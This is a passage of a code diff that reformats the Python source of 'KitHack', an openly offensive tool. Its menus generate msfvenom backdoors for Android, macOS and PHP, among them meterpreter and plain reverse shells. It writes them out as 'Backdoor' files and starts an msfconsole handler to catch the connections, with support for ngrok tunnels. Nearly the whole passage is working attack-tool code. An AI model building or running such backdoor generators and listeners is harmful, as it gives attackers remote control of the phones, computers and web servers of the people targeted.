Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif sys == '04': - print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print( - '{0}[01]{1} osx/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print( - '{0}[02]{1} osx/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print( - '{0}[03]{1} osx/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print( - '{0}[04]{1} osx/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[05]{1} osx/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[06]{1} osx/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) + elif sys == "04": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} osx/x64/meterpreter_reverse_http".format(WHITE, YELLOW)) + print("{0}[02]{1} osx/x64/meterpreter_reverse_https".format(WHITE, YELLOW)) + print("{0}[03]{1} osx/x64/meterpreter_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[04]{1} osx/x64/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[05]{1} osx/x64/shell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} osx/x86/shell_reverse_tcp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) - if pay == '01': + if pay == "01": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '02': + elif pay == "02": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '03': + elif pay == "03": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '04': + elif pay == "04": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '05': + elif pay == "05": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '06': + elif pay == "06": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif sys == '05': - print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} php/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[02]{1} php/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[03]{1} php/reverse_php'.format(WHITE, YELLOW)) + elif sys == "05": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} php/meterpreter_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[02]{1} php/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[03]{1} php/reverse_php".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = tool.zfill(2) - if pay == '01': + if pay == "01": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: + if os.stat("output/{}.php".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - if pay == '02': + if pay == "02": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: + if os.stat("output/{}.php".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; 